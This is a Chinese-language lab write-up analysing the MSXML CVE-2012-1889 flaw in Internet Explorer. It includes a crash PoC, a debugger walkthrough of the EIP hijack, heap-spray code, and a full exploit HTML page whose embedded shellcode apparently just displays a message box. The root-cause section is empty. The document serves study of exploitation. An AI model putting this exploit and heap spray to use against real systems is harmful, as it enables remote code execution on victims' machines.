Microsoft XML Core Services緩衝區溢位漏洞(CVE-2012-1889)漏洞分析報告
軟體名稱: Microsoft XML Core Services
軟體版本:XML 3.0/4.0/5.0/6.0
漏洞模組:msxml3.dll.
實驗系統:windows xp sp3
漏洞影響系統:windows XP/7/8/8.1
漏洞編號:CVE-2012-1889
危害等級:高危
漏洞型別:緩衝區溢位
威脅型別:遠端
1. 軟體簡介
Microsoft XML Core Services (MSXML)是一組服務,可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。
1. 漏洞成因
據CVE-2012-1889描述,
1. 利用過程
3.1漏洞觸發
1.Poc,網路上流傳的
<html>
<head>
<title>CVE 2012-1889 PoC</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
<script>
var obj = document.getElementById('poc').object;
var src = unescape("%u0c0c%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(0);
</script>
</body>
</html>
2.將上面的程式碼儲存為HTML檔案,並且用IE6開啟,並且在警告欄上允許允許阻止的內容,這時候IE瀏覽器就會崩潰
觸發漏洞的程式碼是JavaScript中最後一句,即第16行的obj.definition(0)。definition是DOM物件的一個屬性,而且是隻讀的屬性,不可以把屬性當作函式來使用並往裡面傳遞引數。
此時再次用IE開啟這個網頁,先不允許執行,先用windbg附加上去
輸入g讓程式跑起來,然後把警告的內容執行執行,讓程式觸發異常,斷在異常處。
在執行ecx,dword ptr[eax]的時候,eax的值是0x0C0C0C0C,在0x0C0C0C0C的位置上,並不可讀,所以觸發了一個異常訪問的異常,eax的值來自於ebp-14h記憶體處的值,在執行完對eax的賦值操作之後,程式比較了eax和ebx暫存器的內容,如果eax的內容為0就會跳轉,越過觸發異常的程式碼,但是PoC程式碼在棧上產生了大量的0c0c位元組,於是eax不為0,跳轉也不會執行。
如果要執行程式碼,就需要修改EIP暫存器的內容,call dword ptr [ecx+18h]處,這個地方剛好夠我們轉移EIP。
如果0x0C0C0C0C處存在可以讀的記憶體,那麼就不會觸發訪問異常的情況了,程式就會跳轉到0x0C0C0C0C+0x18處執行程式碼,如果在這裡放上我們構建好的程式碼,那麼漏洞觸發時,就可以執行了
3.2 HeapSpray
在使用HeapSpray的時候,一般會將EIP指向0x0C0C0C0C的位置上,然後利用JavaScript申請大量堆記憶體,並且用包含0x90和shellcode的記憶體覆蓋這些記憶體,通常,JavaScript會從記憶體的低地址向高地址分配記憶體,因此申請的記憶體超過200MB(200MB = 200*1024*1024 = 0x0C800000 > 0x0C0C0C0C)後,0x0C0C0C0C將被含有ShellCode的記憶體片覆蓋。只要記憶體片中的0×90能夠命中0x0C0C0C0C的位置,ShellCode就能最終得到執行。
3.1.1記憶體覆蓋程式碼
1 2 3 4 5 6 7 8 9 |
var nop = "\u9090\u9090"; while (nop.length < 0x100000/2){ nop += nop; } nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2); var slide = new Array(); for (var i = 0; i < 200; i++){ slide[i] = nop + shellcode; } |
上面的程式碼分配了200個1M大小的記憶體塊,每個記憶體塊由shellcode和大量滑板指令0x90構成,其中shellcode位於每個記憶體塊的最末尾部分。
在觸發漏洞時,只需要有任意一個記憶體塊的任意一個滑板指令NOP可以覆蓋在0c0C0C0C0C上面,Shellcode最終都會被執行,使用1M作為記憶體塊的單位,可以使覆蓋成功的機率增加,如果尺寸太小,0x0C0C0C0C的位置可能會被Shellcode所覆蓋,這樣的話,溢位就失敗了。
3.3 漏洞攻擊實驗
1. PoC
<html>
<head>
<title>CVE 2012-1889 PoC v3 By:15PB.Com</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
<script>
// 1. 準備好Shellcode(unescape()是解碼函式)
var cShellcode = unescape(
"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
"\uC25D\u0010\u0000");
// 2. 製作一塊劃板資料
// 2.1 計算填充劃板指令資料的大小(都除2是因為length返回的是Unicode的字元個數)
var nSlideSize = 1024*1024 / 2; // 一個劃板指令區的大小(1MB)
var nMlcHadSize = 32 / 2; // 堆頭部大小
var nStrLenSize = 4 / 2; // 堆長度資訊大小
var nTerminatorSize = 2 / 2; // 堆結尾符號大小
var nScSize = cShellcode.length; // Shellcode大小
var nFillSize = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;
// 2.2 填充劃板指令,製作好一塊填充資料
var cFillData = unescape("\u0C0C\u0C0C"); // 劃板指令0C0C OR AL,0C
var cSlideData = new Array(); // 申請一個數組物件用於儲存劃板資料
while (cFillData.length <= nSlideSize)
cFillData += cFillData;
cFillData = cFillData.substring(0, nFillSize);
// 3. 填充200MB的記憶體區域(申請200塊1MB大小的劃板資料區),試圖覆蓋0x0C0C0C0C
// 區域,每塊劃板資料均由 劃板資料+Shellcode組成,這樣只要任意一塊劃板資料
// 正好落在0x0C0C0C0C處,大量無用的“OR AL,0C”就會將執行流程引到劃板資料區
// 後面的Shellcode處,進而執行Shellcode。
for (var i = 0; i < 200; i++)
cSlideData[i] = cFillData + cShellcode;
// 4. 觸發CVE 2012-1889漏洞
// 4.1 獲取名為15PB的XML物件,並將其儲存到名為obj15PB例項中
var obj15PB = document.getElementById('15PB').object;
// 4.2 構建一個長度為0x1000-10=8182,起始內容為“\\15PB_Com”位元組的資料
var srcImgPath = unescape("\u0C0C\u0C0C");
while (srcImgPath.length < 0x1000)
srcImgPath += srcImgPath;
srcImgPath = "\\\\15PB_Com" + srcImgPath;
srcImgPath = srcImgPath.substr(0, 0x1000-10);
// 4.3 建立一個圖片元素,並將圖片源路徑設為srcImgPath,並返回當前圖片檔名
var emtPic = document.createElement("img");
emtPic.src = srcImgPath;
emtPic.nameProp;
// 4.4 定義物件obj15PB(觸發溢位)
obj15PB.definition(0);
</script>
</body>
</html>
5.參考資料
CSDN部落格
《軟體除錯》張銀奎 著
《0day安全:軟體漏洞分析技術(第2版)》 王清 著